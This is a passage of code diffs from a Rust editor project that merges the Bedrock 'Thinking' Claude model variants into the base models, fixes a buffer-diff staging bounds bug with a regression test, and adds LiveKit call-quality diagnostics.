- Self::ClaudeSonnet4Thinking => "claude-sonnet-4-thinking",
Self::ClaudeSonnet4_5 => "claude-sonnet-4-5",
- Self::ClaudeSonnet4_5Thinking => "claude-sonnet-4-5-thinking",
Self::ClaudeOpus4_1 => "claude-opus-4-1",
- Self::ClaudeOpus4_1Thinking => "claude-opus-4-1-thinking",
Self::ClaudeOpus4_5 => "claude-opus-4-5",
- Self::ClaudeOpus4_5Thinking => "claude-opus-4-5-thinking",
Self::ClaudeOpus4_6 => "claude-opus-4-6",
- Self::ClaudeOpus4_6Thinking => "claude-opus-4-6-thinking",
Self::ClaudeSonnet4_6 => "claude-sonnet-4-6",
- Self::ClaudeSonnet4_6Thinking => "claude-sonnet-4-6-thinking",
Self::Llama4Scout17B => "llama-4-scout-17b",
Self::Llama4Maverick17B => "llama-4-maverick-17b",
Self::Gemma3_4B => "gemma-3-4b",
@@ -261,20 +243,12 @@ impl Model {
pub fn request_id(&self) -> &str {
match self {
Self::ClaudeHaiku4_5 => "anthropic.claude-haiku-4-5-20251001-v1:0",
- Self::ClaudeSonnet4 | Self::ClaudeSonnet4Thinking => {
- "anthropic.claude-sonnet-4-20250514-v1:0"
- }
- Self::ClaudeSonnet4_5 | Self::ClaudeSonnet4_5Thinking => {
- "anthropic.claude-sonnet-4-5-20250929-v1:0"
- }
- Self::ClaudeOpus4_1 | Self::ClaudeOpus4_1Thinking => {
- "anthropic.claude-opus-4-1-20250805-v1:0"
- }
- Self::ClaudeOpus4_5 | Self::ClaudeOpus4_5Thinking => {
- "anthropic.claude-opus-4-5-20251101-v1:0"
- }
- Self::ClaudeOpus4_6 | Self::ClaudeOpus4_6Thinking => "anthropic.claude-opus-4-6-v1",
- Self::ClaudeSonnet4_6 | Self::ClaudeSonnet4_6Thinking => "anthropic.claude-sonnet-4-6",
+ Self::ClaudeSonnet4 => "anthropic.claude-sonnet-4-20250514-v1:0",
+ Self::ClaudeSonnet4_5 => "anthropic.claude-sonnet-4-5-20250929-v1:0",
+ Self::ClaudeOpus4_1 => "anthropic.claude-opus-4-1-20250805-v1:0",
+ Self::ClaudeOpus4_5 => "anthropic.claude-opus-4-5-20251101-v1:0",
+ Self::ClaudeOpus4_6 => "anthropic.claude-opus-4-6-v1",
+ Self::ClaudeSonnet4_6 => "anthropic.claude-sonnet-4-6",
Self::Llama4Scout17B => "meta.llama4-scout-17b-instruct-v1:0",
Self::Llama4Maverick17B => "meta.llama4-maverick-17b-instruct-v1:0",
Self::Gemma3_4B => "google.gemma-3-4b-it",
@@ -310,17 +284,11 @@ impl Model {
match self {
Self::ClaudeHaiku4_5 => "Claude Haiku 4.5",
Self::ClaudeSonnet4 => "Claude Sonnet 4",
- Self::ClaudeSonnet4Thinking => "Claude Sonnet 4 Thinking",
Self::ClaudeSonnet4_5 => "Claude Sonnet 4.5",
- Self::ClaudeSonnet4_5Thinking => "Claude Sonnet 4.5 Thinking",
Self::ClaudeOpus4_1 => "Claude Opus 4.1",
- Self::ClaudeOpus4_1Thinking => "Claude Opus 4.1 Thinking",
Self::ClaudeOpus4_5 => "Claude Opus 4.5",
- Self::ClaudeOpus4_5Thinking => "Claude Opus 4.5 Thinking",
Self::ClaudeOpus4_6 => "Claude Opus 4.6",
- Self::ClaudeOpus4_6Thinking => "Claude Opus 4.6 Thinking",
Self::ClaudeSonnet4_6 => "Claude Sonnet 4.6",
- Self::ClaudeSonnet4_6Thinking => "Claude Sonnet 4.6 Thinking",
Self::Llama4Scout17B => "Llama 4 Scout 17B",
Self::Llama4Maverick17B => "Llama 4 Maverick 17B",
Self::Gemma3_4B => "Gemma 3 4B",
@@ -362,17 +330,11 @@ impl Model {
match self {
Self::ClaudeHaiku4_5
| Self::ClaudeSonnet4
- | Self::ClaudeSonnet4Thinking
| Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5Thinking
| Self::ClaudeOpus4_1
- | Self::ClaudeOpus4_1Thinking
| Self::ClaudeOpus4_5
- | Self::ClaudeOpus4_5Thinking
| Self::ClaudeOpus4_6
- | Self::ClaudeOpus4_6Thinking
- | Self::ClaudeSonnet4_6
- | Self::ClaudeSonnet4_6Thinking => 200_000,
+ | Self::ClaudeSonnet4_6 => 200_000,
Self::Llama4Scout17B | Self::Llama4Maverick17B => 128_000,
Self::Gemma3_4B | Self::Gemma3_12B | Self::Gemma3_27B => 128_000,
Self::MagistralSmall | Self::MistralLarge3 | Self::PixtralLarge => 128_000,
@@ -397,15 +359,12 @@ impl Model {
pub fn max_output_tokens(&self) -> u64 {
match self {
Self::ClaudeHaiku4_5
+ | Self::ClaudeSonnet4
| Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5Thinking
| Self::ClaudeOpus4_5
- | Self::ClaudeOpus4_5Thinking
- | Self::ClaudeSonnet4_6
- | Self::ClaudeSonnet4_6Thinking => 64_000,
- Self::ClaudeSonnet4 | Self::ClaudeSonnet4Thinking => 64_000,
- Self::ClaudeOpus4_1 | Self::ClaudeOpus4_1Thinking => 32_000,
- Self::ClaudeOpus4_6 | Self::ClaudeOpus4_6Thinking => 128_000,
+ | Self::ClaudeSonnet4_6 => 64_000,
+ Self::ClaudeOpus4_1 => 32_000,
+ Self::ClaudeOpus4_6 => 128_000,
Self::Llama4Scout17B
| Self::Llama4Maverick17B
| Self::Gemma3_4B
@@ -436,17 +395,11 @@ impl Model {
match self {
Self::ClaudeHaiku4_5
| Self::ClaudeSonnet4
- | Self::ClaudeSonnet4Thinking
| Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5Thinking
| Self::ClaudeOpus4_1
- | Self::ClaudeOpus4_1Thinking
| Self::ClaudeOpus4_5
- | Self::ClaudeOpus4_5Thinking
| Self::ClaudeOpus4_6
- | Self::ClaudeOpus4_6Thinking
- | Self::ClaudeSonnet4_6
- | Self::ClaudeSonnet4_6Thinking => 1.0,
+ | Self::ClaudeSonnet4_6 => 1.0,
Self::Custom {
default_temperature,
..
@@ -459,17 +412,11 @@ impl Model {
match self {
Self::ClaudeHaiku4_5
| Self::ClaudeSonnet4
- | Self::ClaudeSonnet4Thinking
| Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5Thinking
| Self::ClaudeOpus4_1
- | Self::ClaudeOpus4_1Thinking
| Self::ClaudeOpus4_5
- | Self::ClaudeOpus4_5Thinking
| Self::ClaudeOpus4_6
- | Self::ClaudeOpus4_6Thinking
- | Self::ClaudeSonnet4_6
- | Self::ClaudeSonnet4_6Thinking => true,
+ | Self::ClaudeSonnet4_6 => true,
Self::NovaLite | Self::NovaPro | Self::NovaPremier | Self::Nova2Lite => true,
Self::MistralLarge3 | Self::PixtralLarge | Self::MagistralSmall => true,
// Gemma accepts toolConfig without error but produces unreliable tool
@@ -492,17 +439,11 @@ impl Model {
match self {
Self::ClaudeHaiku4_5
| Self::ClaudeSonnet4
- | Self::ClaudeSonnet4Thinking
| Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5Thinking
| Self::ClaudeOpus4_1
- | Self::ClaudeOpus4_1Thinking
| Self::ClaudeOpus4_5
- | Self::ClaudeOpus4_5Thinking
| Self::ClaudeOpus4_6
- | Self::ClaudeOpus4_6Thinking
- | Self::ClaudeSonnet4_6
- | Self::ClaudeSonnet4_6Thinking => true,
+ | Self::ClaudeSonnet4_6 => true,
Self::NovaLite | Self::NovaPro => true,
Self::PixtralLarge => true,
Self::Qwen3VL235B => true,
@@ -515,15 +456,10 @@ impl Model {
matches!(
self,
Self::ClaudeSonnet4
- | Self::ClaudeSonnet4Thinking
| Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5Thinking
| Self::ClaudeOpus4_5
- | Self::ClaudeOpus4_5Thinking
| Self::ClaudeOpus4_6
- | Self::ClaudeOpus4_6Thinking
| Self::ClaudeSonnet4_6
- | Self::ClaudeSonnet4_6Thinking
)
}
@@ -531,17 +467,11 @@ impl Model {
match self {
Self::ClaudeHaiku4_5
| Self::ClaudeSonnet4
- | Self::ClaudeSonnet4Thinking
| Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5Thinking
| Self::ClaudeOpus4_1
- | Self::ClaudeOpus4_1Thinking
| Self::ClaudeOpus4_5
- | Self::ClaudeOpus4_5Thinking
| Self::ClaudeOpus4_6
- | Self::ClaudeOpus4_6Thinking
- | Self::ClaudeSonnet4_6
- | Self::ClaudeSonnet4_6Thinking => true,
+ | Self::ClaudeSonnet4_6 => true,
Self::Custom {
cache_configuration,
..
@@ -553,17 +483,11 @@ impl Model {
pub fn cache_configuration(&self) -> Option<BedrockModelCacheConfiguration> {
match self {
Self::ClaudeSonnet4
- | Self::ClaudeSonnet4Thinking
| Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5Thinking
| Self::ClaudeOpus4_1
- | Self::ClaudeOpus4_1Thinking
| Self::ClaudeOpus4_5
- | Self::ClaudeOpus4_5Thinking
| Self::ClaudeOpus4_6
- | Self::ClaudeOpus4_6Thinking
- | Self::ClaudeSonnet4_6
- | Self::ClaudeSonnet4_6Thinking => Some(BedrockModelCacheConfiguration {
+ | Self::ClaudeSonnet4_6 => Some(BedrockModelCacheConfiguration {
max_cache_anchors: 4,
min_total_token: 1024,
}),
@@ -579,25 +503,34 @@ impl Model {
}
}
- pub fn mode(&self) -> BedrockModelMode {
- match self {
- Self::ClaudeSonnet4Thinking | Self::ClaudeSonnet4_5Thinking => {
- BedrockModelMode::Thinking {
- budget_tokens: Some(4096),
- }
+ pub fn supports_thinking(&self) -> bool {
+ matches!(
+ self,
+ Self::ClaudeHaiku4_5
+ | Self::ClaudeSonnet4
+ | Self::ClaudeSonnet4_5
+ | Self::ClaudeOpus4_1
+ | Self::ClaudeOpus4_5
+ | Self::ClaudeOpus4_6
+ | Self::ClaudeSonnet4_6
+ )
+ }
+
+ pub fn supports_adaptive_thinking(&self) -> bool {
+ matches!(self, Self::ClaudeOpus4_6 | Self::ClaudeSonnet4_6)
+ }
+
+ pub fn thinking_mode(&self) -> BedrockModelMode {
+ if self.supports_adaptive_thinking() {
+ BedrockModelMode::AdaptiveThinking {
+ effort: BedrockAdaptiveThinkingEffort::default(),
}
- Self::ClaudeOpus4_1Thinking | Self::ClaudeOpus4_5Thinking => {
- BedrockModelMode::Thinking {
- budget_tokens: Some(4096),
- }
+ } else if self.supports_thinking() {
+ BedrockModelMode::Thinking {
+ budget_tokens: Some(4096),
}
- Self::ClaudeOpus4_6Thinking => BedrockModelMode::AdaptiveThinking {
- effort: BedrockAdaptiveThinkingEffort::default(),
- },
- Self::ClaudeSonnet4_6Thinking => BedrockModelMode::AdaptiveThinking {
- effort: BedrockAdaptiveThinkingEffort::default(),
- },
- _ => BedrockModelMode::Default,
+ } else {
+ BedrockModelMode::Default
}
}
@@ -612,15 +545,10 @@ impl Model {
self,
Self::ClaudeHaiku4_5
| Self::ClaudeSonnet4
- | Self::ClaudeSonnet4Thinking
| Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5Thinking
| Self::ClaudeOpus4_5
- | Self::ClaudeOpus4_5Thinking
| Self::ClaudeOpus4_6
- | Self::ClaudeOpus4_6Thinking
| Self::ClaudeSonnet4_6
- | Self::ClaudeSonnet4_6Thinking
| Self::Nova2Lite
);
@@ -676,39 +604,26 @@ impl Model {
(
Self::ClaudeHaiku4_5
| Self::ClaudeSonnet4
- | Self::ClaudeSonnet4Thinking
| Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5Thinking
| Self::ClaudeOpus4_5
- | Self::ClaudeOpus4_5Thinking
| Self::ClaudeOpus4_6
- | Self::ClaudeOpus4_6Thinking
| Self::ClaudeSonnet4_6
- | Self::ClaudeSonnet4_6Thinking
| Self::Nova2Lite,
"global",
) => Ok(format!("{}.{}", region_group, model_id)),
// US Government region inference profiles
- (Self::ClaudeSonnet4_5 | Self::ClaudeSonnet4_5Thinking, "us-gov") => {
- Ok(format!("{}.{}", region_group, model_id))
- }
+ (Self::ClaudeSonnet4_5, "us-gov") => Ok(format!("{}.{}", region_group, model_id)),
// US region inference profiles
(
Self::ClaudeHaiku4_5
| Self::ClaudeSonnet4
- | Self::ClaudeSonnet4Thinking
| Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5Thinking
| Self::ClaudeOpus4_1
- | Self::ClaudeOpus4_1Thinking
| Self::ClaudeOpus4_5
- | Self::ClaudeOpus4_5Thinking
| Self::ClaudeOpus4_6
- | Self::ClaudeOpus4_6Thinking
| Self::ClaudeSonnet4_6
- | Self::ClaudeSonnet4_6Thinking
| Self::Llama4Scout17B
| Self::Llama4Maverick17B
| Self::NovaLite
@@ -728,11 +643,8 @@ impl Model {
Self::ClaudeHaiku4_5
| Self::ClaudeSonnet4
| Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5Thinking
| Self::ClaudeOpus4_6
- | Self::ClaudeOpus4_6Thinking
| Self::ClaudeSonnet4_6
- | Self::ClaudeSonnet4_6Thinking
| Self::NovaLite
| Self::NovaPro
| Self::Nova2Lite,
@@ -743,11 +655,8 @@ impl Model {
(
Self::ClaudeHaiku4_5
| Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5Thinking
| Self::ClaudeOpus4_6
- | Self::ClaudeOpus4_6Thinking
- | Self::ClaudeSonnet4_6
- | Self::ClaudeSonnet4_6Thinking,
+ | Self::ClaudeSonnet4_6,
"au",
) => Ok(format!("{}.{}", region_group, model_id)),
@@ -755,9 +664,7 @@ impl Model {
(
Self::ClaudeHaiku4_5
| Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5Thinking
| Self::ClaudeSonnet4_6
- | Self::ClaudeSonnet4_6Thinking
| Self::Nova2Lite,
"jp",
) => Ok(format!("{}.{}", region_group, model_id)),
@@ -767,7 +674,6 @@ impl Model {
Self::ClaudeHaiku4_5
| Self::ClaudeSonnet4
| Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5Thinking
| Self::NovaLite
| Self::NovaPro
| Self::Nova2Lite,
@@ -889,7 +795,7 @@ mod tests {
"us-gov.anthropic.claude-sonnet-4-5-20250929-v1:0"
);
assert_eq!(
- Model::ClaudeSonnet4_5Thinking.cross_region_inference_id("us-gov-west-1", false)?,
+ Model::ClaudeSonnet4_5.cross_region_inference_id("us-gov-west-1", false)?,
"us-gov.anthropic.claude-sonnet-4-5-20250929-v1:0"
);
Ok(())
@@ -996,33 +902,43 @@ mod tests {
"meta.llama4-scout-17b-instruct-v1:0"
);
- // Thinking models have different friendly IDs but same request IDs
+ // Thinking aliases deserialize to the same model
assert_eq!(Model::ClaudeSonnet4.id(), "claude-sonnet-4");
assert_eq!(
- Model::ClaudeSonnet4Thinking.id(),
- "claude-sonnet-4-thinking"
- );
- assert_eq!(
- Model::ClaudeSonnet4.request_id(),
- Model::ClaudeSonnet4Thinking.request_id()
+ Model::from_id("claude-sonnet-4-thinking").unwrap().id(),
+ "claude-sonnet-4"
);
}
#[test]
- fn test_model_modes() {
- assert_eq!(Model::ClaudeSonnet4.mode(), BedrockModelMode::Default);
+ fn test_thinking_modes() {
+ assert!(Model::ClaudeHaiku4_5.supports_thinking());
+ assert!(Model::ClaudeSonnet4.supports_thinking());
+ assert!(Model::ClaudeSonnet4_5.supports_thinking());
+ assert!(Model::ClaudeOpus4_6.supports_thinking());
+
+ assert!(!Model::ClaudeSonnet4.supports_adaptive_thinking());
+ assert!(Model::ClaudeOpus4_6.supports_adaptive_thinking());
+ assert!(Model::ClaudeSonnet4_6.supports_adaptive_thinking());
+
assert_eq!(
- Model::ClaudeSonnet4Thinking.mode(),
+ Model::ClaudeSonnet4.thinking_mode(),
BedrockModelMode::Thinking {
budget_tokens: Some(4096)
}
);
assert_eq!(
- Model::ClaudeOpus4_6Thinking.mode(),
+ Model::ClaudeOpus4_6.thinking_mode(),
BedrockModelMode::AdaptiveThinking {
effort: BedrockAdaptiveThinkingEffort::High
}
);
+ assert_eq!(
+ Model::ClaudeHaiku4_5.thinking_mode(),
+ BedrockModelMode::Thinking {
+ budget_tokens: Some(4096)
+ }
+ );
}
#[test]
@@ -1,14 +1,15 @@
use gpui::{
- AnyElement, App, Context, EventEmitter, Global, IntoElement, Render, Subscription, Window,
+ AnyElement, App, Context, EventEmitter, Font, Global, IntoElement, Render, Subscription, Window,
};
use ui::prelude::*;
use workspace::{
ToolbarItemEvent, ToolbarItemLocation, ToolbarItemView,
- item::{BreadcrumbText, ItemEvent, ItemHandle},
+ item::{HighlightedText, ItemEvent, ItemHandle},
};
type RenderBreadcrumbTextFn = fn(
- Vec<BreadcrumbText>,
+ Vec<HighlightedText>,
+ Option<Font>,
Option<AnyElement>,
&dyn ItemHandle,
bool,
@@ -57,7 +58,7 @@ impl Render for Breadcrumbs {
return element.into_any_element();
};
- let Some(segments) = active_item.breadcrumbs(cx) else {
+ let Some((segments, breadcrumb_font)) = active_item.breadcrumbs(cx) else {
return element.into_any_element();
};
@@ -66,6 +67,7 @@ impl Render for Breadcrumbs {
if let Some(render_fn) = cx.try_global::<RenderBreadcrumbText>() {
(render_fn.0)(
segments,
+ breadcrumb_font,
prefix_element,
active_item.as_ref(),
false,
@@ -890,6 +890,16 @@ impl BufferDiffInner<Entity<language::Buffer>> {
.end
.saturating_sub(prev_unstaged_hunk_buffer_end);
let index_end = prev_unstaged_hunk_base_text_end + end_overshoot;
+
+ // Clamp to the index text bounds. The overshoot mapping assumes that
+ // text between unstaged hunks is identical in the buffer and index.
+ // When the buffer has been edited since the diff was computed, anchor
+ // positions shift while diff_base_byte_range values don't, which can
+ // cause index_end to exceed index_text.len().
+    // See `test_stage_all_with_stale_buffer`, which would hit an assert
+    // without these `min` calls.
+ let index_end = index_end.min(index_text.len());
+ let index_start = index_start.min(index_end);
let index_byte_range = index_start..index_end;
let replacement_text = match new_status {
@@ -2738,6 +2748,51 @@ mod tests {
});
}
+ #[gpui::test]
+ async fn test_stage_all_with_stale_buffer(cx: &mut TestAppContext) {
+ // Regression test for ZED-5R2: when the buffer is edited after the diff is
+ // computed but before staging, anchor positions shift while diff_base_byte_range
+ // values don't. If the primary (HEAD) hunk extends past the unstaged (index)
+ // hunk, an edit in the extension region shifts the primary hunk end without
+ // shifting the unstaged hunk end. The overshoot calculation then produces an
+ // index_end that exceeds index_text.len().
+ //
+ // Setup:
+ // HEAD: "aaa\nbbb\nccc\n" (primary hunk covers lines 1-2)
+ // Index: "aaa\nbbb\nCCC\n" (unstaged hunk covers line 1 only)
+ // Buffer: "aaa\nBBB\nCCC\n" (both lines differ from HEAD)
+ //
+ // The primary hunk spans buffer offsets 4..12, but the unstaged hunk only
+ // spans 4..8. The pending hunk extends 4 bytes past the unstaged hunk.
+ // An edit at offset 9 (inside "CCC") shifts the primary hunk end from 12
+ // to 13 but leaves the unstaged hunk end at 8, making index_end = 13 > 12.
+ let head_text = "aaa\nbbb\nccc\n";
+ let index_text = "aaa\nbbb\nCCC\n";
+ let buffer_text = "aaa\nBBB\nCCC\n";
+
+ let mut buffer = Buffer::new(
+ ReplicaId::LOCAL,
+ BufferId::new(1).unwrap(),
+ buffer_text.to_string(),
+ );
+
+ let unstaged_diff = cx.new(|cx| BufferDiff::new_with_base_text(index_text, &buffer, cx));
+ let uncommitted_diff = cx.new(|cx| {
+ let mut diff = BufferDiff::new_with_base_text(head_text, &buffer, cx);
+ diff.set_secondary_diff(unstaged_diff);
+ diff
+ });
+
+ // Edit the buffer in the region between the unstaged hunk end (offset 8)
+ // and the primary hunk end (offset 12). This shifts the primary hunk end
+ // but not the unstaged hunk end.
+ buffer.edit([(9..9, "Z")]);
+
+ uncommitted_diff.update(cx, |diff, cx| {
+ diff.stage_or_unstage_all_hunks(true, &buffer, true, cx);
+ });
+ }
+
#[gpui::test]
async fn test_toggling_stage_and_unstage_same_hunk(cx: &mut TestAppContext) {
let head_text = "
@@ -19,7 +19,8 @@ test-support = [
"gpui/test-support",
"livekit_client/test-support",
"project/test-support",
- "util/test-support"
+ "util/test-support",
+ "workspace/test-support"
]
[dependencies]
@@ -51,5 +52,6 @@ gpui = { workspace = true, features = ["test-support"] }
language = { workspace = true, features = ["test-support"] }
project = { workspace = true, features = ["test-support"] }
util = { workspace = true, features = ["test-support"] }
+workspace = { workspace = true, features = ["test-support"] }
livekit_client = { workspace = true, features = ["test-support"] }
@@ -0,0 +1,232 @@
+use gpui::{Context, Task, WeakEntity};
+use livekit_client::ConnectionQuality;
+use std::time::Duration;
+
+use super::room::Room;
+
+#[derive(Clone, Default)]
+pub struct CallStats {
+ pub connection_quality: Option<ConnectionQuality>,
+ pub effective_quality: Option<ConnectionQuality>,
+ pub latency_ms: Option<f64>,
+ pub jitter_ms: Option<f64>,
+ pub packet_loss_pct: Option<f64>,
+ pub input_lag: Option<Duration>,
+}
+
+pub struct CallDiagnostics {
+ stats: CallStats,
+ room: WeakEntity<Room>,
+ poll_task: Option<Task<()>>,
+ stats_update_task: Option<Task<()>>,
+}
+
+impl CallDiagnostics {
+ pub fn new(room: WeakEntity<Room>, cx: &mut Context<Self>) -> Self {
+ let mut this = Self {
+ stats: CallStats::default(),
+ room,
+ poll_task: None,
+ stats_update_task: None,
+ };
+ this.start_polling(cx);
+ this
+ }
+
+ pub fn stats(&self) -> &CallStats {
+ &self.stats
+ }
+
+ fn start_polling(&mut self, cx: &mut Context<Self>) {
+ self.poll_task = Some(cx.spawn(async move |this, cx| {
+ loop {
+ if this.update(cx, |this, cx| this.poll_stats(cx)).is_err() {
+ break;
+ }
+ cx.background_executor().timer(Duration::from_secs(1)).await;
+ }
+ }));
+ }
+
+ fn poll_stats(&mut self, cx: &mut Context<Self>) {
+ let Some(room) = self.room.upgrade() else {
+ return;
+ };
+
+ let connection_quality = room.read(cx).connection_quality();
+ self.stats.connection_quality = Some(connection_quality);
+ self.stats.input_lag = room.read(cx).input_lag();
+
+ let stats_future = room.read(cx).get_stats(cx);
+
+ let background_task = cx.background_executor().spawn(async move {
+ let session_stats = stats_future.await;
+ session_stats.map(|stats| compute_network_stats(&stats))
+ });
+
+ self.stats_update_task = Some(cx.spawn(async move |this, cx| {
+ let result = background_task.await;
+ this.update(cx, |this, cx| {
+ if let Some(computed) = result {
+ this.stats.latency_ms = computed.latency_ms;
+ this.stats.jitter_ms = computed.jitter_ms;
+ this.stats.packet_loss_pct = computed.packet_loss_pct;
+ }
+ let quality = this
+ .stats
+ .connection_quality
+ .unwrap_or(ConnectionQuality::Lost);
+ this.stats.effective_quality =
+ Some(effective_connection_quality(quality, &this.stats));
+ cx.notify();
+ })
+ .ok();
+ }));
+ }
+}
+
+struct ComputedNetworkStats {
+ latency_ms: Option<f64>,
+ jitter_ms: Option<f64>,
+ packet_loss_pct: Option<f64>,
+}
+
+fn compute_network_stats(stats: &livekit_client::SessionStats) -> ComputedNetworkStats {
+ let mut min_rtt: Option<f64> = None;
+ let mut max_jitter: Option<f64> = None;
+ let mut total_packets_received: u64 = 0;
+ let mut total_packets_lost: i64 = 0;
+
+ let all_stats = stats
+ .publisher_stats
+ .iter()
+ .chain(stats.subscriber_stats.iter());
+
+ for stat in all_stats {
+ extract_metrics(
+ stat,
+ &mut min_rtt,
+ &mut max_jitter,
+ &mut total_packets_received,
+ &mut total_packets_lost,
+ );
+ }
+
+ let total_expected = total_packets_received as i64 + total_packets_lost;
+ let packet_loss_pct = if total_expected > 0 {
+ Some((total_packets_lost as f64 / total_expected as f64) * 100.0)
+ } else {
+ None
+ };
+
+ ComputedNetworkStats {
+ latency_ms: min_rtt.map(|rtt| rtt * 1000.0),
+ jitter_ms: max_jitter.map(|j| j * 1000.0),
+ packet_loss_pct,
+ }
+}
+
+#[cfg(all(
+ not(rust_analyzer),
+ any(
+ test,
+ feature = "test-support",
+ all(target_os = "windows", target_env = "gnu"),
+ target_os = "freebsd"
+ )
+))]
+fn extract_metrics(
+ _stat: &livekit_client::RtcStats,
+ _min_rtt: &mut Option<f64>,
+ _max_jitter: &mut Option<f64>,
+ _total_packets_received: &mut u64,
+ _total_packets_lost: &mut i64,
+) {
+}
+
+#[cfg(any(
+ rust_analyzer,
+ not(any(
+ test,
+ feature = "test-support",
+ all(target_os = "windows", target_env = "gnu"),
+ target_os = "freebsd"
+ ))
+))]
+fn extract_metrics(
+ stat: &livekit_client::RtcStats,
+ min_rtt: &mut Option<f64>,
+ max_jitter: &mut Option<f64>,
+ total_packets_received: &mut u64,
+ total_packets_lost: &mut i64,
+) {
+ use livekit_client::RtcStats;
+
+ match stat {
+ RtcStats::CandidatePair(pair) => {
+ let rtt = pair.candidate_pair.current_round_trip_time;
+ if rtt > 0.0 {
+ *min_rtt = Some(match *min_rtt {
+ Some(current) => current.min(rtt),
+ None => rtt,
+ });
+ }
+ }
+ RtcStats::InboundRtp(inbound) => {
+ let jitter = inbound.received.jitter;
+ if jitter > 0.0 {
+ *max_jitter = Some(match *max_jitter {
+ Some(current) => current.max(jitter),
+ None => jitter,
+ });
+ }
+ *total_packets_received += inbound.received.packets_received;
+ *total_packets_lost += inbound.received.packets_lost;
+ }
+ RtcStats::RemoteInboundRtp(remote_inbound) => {
+ let rtt = remote_inbound.remote_inbound.round_trip_time;
+ if rtt > 0.0 {
+ *min_rtt = Some(match *min_rtt {
+ Some(current) => current.min(rtt),
+ None => rtt,
+ });
+ }
+ }
+ _ => {}
+ }
+}
+
+fn metric_quality(value: f64, warn_threshold: f64, error_threshold: f64) -> ConnectionQuality {
+ if value < warn_threshold {
+ ConnectionQuality::Excellent
+ } else if value < error_threshold {
+ ConnectionQuality::Poor
+ } else {
+ ConnectionQuality::Lost
+ }
+}
+
+/// Computes the effective connection quality by taking the worst of the
+/// LiveKit-reported quality and each individual metric rating.
+fn effective_connection_quality(
+ livekit_quality: ConnectionQuality,
+ stats: &CallStats,
+) -> ConnectionQuality {
+ let mut worst = livekit_quality;
+
+ if let Some(latency) = stats.latency_ms {
+ worst = worst.max(metric_quality(latency, 100.0, 300.0));
+ }
+ if let Some(jitter) = stats.jitter_ms {
+ worst = worst.max(metric_quality(jitter, 30.0, 75.0));
+ }
+ if let Some(loss) = stats.packet_loss_pct {
+ worst = worst.max(metric_quality(loss, 1.0, 5.0));
+ }
+ if let Some(lag) = stats.input_lag {
+ let lag_ms = lag.as_secs_f64() * 1000.0;
+ worst = worst.max(metric_quality(lag_ms, 20.0, 50.0));
+ }
+
+ worst
+}
@@ -1,3 +1,4 @@
+pub mod diagnostics;
pub mod participant;
pub mod room;
@@ -23,7 +23,10 @@ use livekit_client::{self as livekit, AudioStream, TrackSid};
use postage::{sink::Sink, stream::Stream, watch};
use project::Project;
use settings::Settings as _;
+use std::sync::atomic::AtomicU64;
use std::{future::Future, mem, rc::Rc, sync::Arc, time::Duration, time::Instant};
+
+use super::diagnostics::CallDiagnostics;
use util::{ResultExt, TryFutureExt, paths::PathStyle, post_inc};
use workspace::ParticipantLocation;
@@ -69,6 +72,7 @@ pub struct Room {
id: u64,
channel_id: Option<ChannelId>,
live_kit: Option<LiveKitRoom>,
+ diagnostics: Option<Entity<CallDiagnostics>>,
status: RoomStatus,
shared_projects: HashSet<WeakEntity<Project>>,
joined_projects: HashSet<WeakEntity<Project>>,
@@ -136,6 +140,7 @@ impl Room {
id,
channel_id,
live_kit: None,
+ diagnostics: None,
status: RoomStatus::Online,
shared_projects: Default::default(),
joined_projects: Default::default(),
@@ -350,6 +355,7 @@ impl Room {
self.participant_user_ids.clear();
self.client_subscriptions.clear();
self.live_kit.take();
+ self.diagnostics.take();
self.pending_room_update.take();
self.maintain_connection.take();
}
@@ -540,6 +546,42 @@ impl Room {
}
}
+ pub fn get_stats(&self, cx: &App) -> Task<Option<livekit::SessionStats>> {
+ match self.live_kit.as_ref() {
+ Some(lk) => {
+ let task = lk.room.stats_task(cx);
+ cx.background_executor()
+ .spawn(async move { task.await.ok() })
+ }
+ None => Task::ready(None),
+ }
+ }
+
+ pub fn input_lag(&self) -> Option<Duration> {
+ let us = self
+ .live_kit
+ .as_ref()?
+ .input_lag_us
+ .as_ref()?
+ .load(std::sync::atomic::Ordering::Relaxed);
+ if us > 0 {
+ Some(Duration::from_micros(us))
+ } else {
+ None
+ }
+ }
+
+ pub fn diagnostics(&self) -> Option<&Entity<CallDiagnostics>> {
+ self.diagnostics.as_ref()
+ }
+
+ pub fn connection_quality(&self) -> livekit::ConnectionQuality {
+ self.live_kit
+ .as_ref()
+ .map(|lk| lk.room.local_participant().connection_quality())
+ .unwrap_or(livekit::ConnectionQuality::Lost)
+ }
+
pub fn status(&self) -> RoomStatus {
self.status
}
@@ -1383,7 +1425,7 @@ impl Room {
};
match publication {
- Ok((publication, stream)) => {
+ Ok((publication, stream, input_lag_us)) => {
if canceled {
cx.spawn(async move |_, cx| {
room.unpublish_local_track(publication.sid(), cx).await
@@ -1393,6 +1435,7 @@ impl Room {
if live_kit.muted_by_user || live_kit.deafened {
publication.mute(cx);
}
+ live_kit.input_lag_us = Some(input_lag_us);
live_kit.microphone_track = LocalTrack::Published {
track_publication: publication,
_stream: Box::new(stream),
@@ -1486,6 +1529,84 @@ impl Room {
})
}
+ #[cfg(target_os = "linux")]
+ pub fn share_screen_wayland(&mut self, cx: &mut Context<Self>) -> Task<Result<()>> {
+ log::info!("will screenshare on wayland");
+ if self.status.is_offline() {
+ return Task::ready(Err(anyhow!("room is offline")));
+ }
+ if self.is_sharing_screen() {
+ return Task::ready(Err(anyhow!("screen was already shared")));
+ }
+
+ let (participant, publish_id) = if let Some(live_kit) = self.live_kit.as_mut() {
+ let publish_id = post_inc(&mut live_kit.next_publish_id);
+ live_kit.screen_track = LocalTrack::Pending { publish_id };
+ cx.notify();
+ (live_kit.room.local_participant(), publish_id)
+ } else {
+ return Task::ready(Err(anyhow!("live-kit was not initialized")));
+ };
+
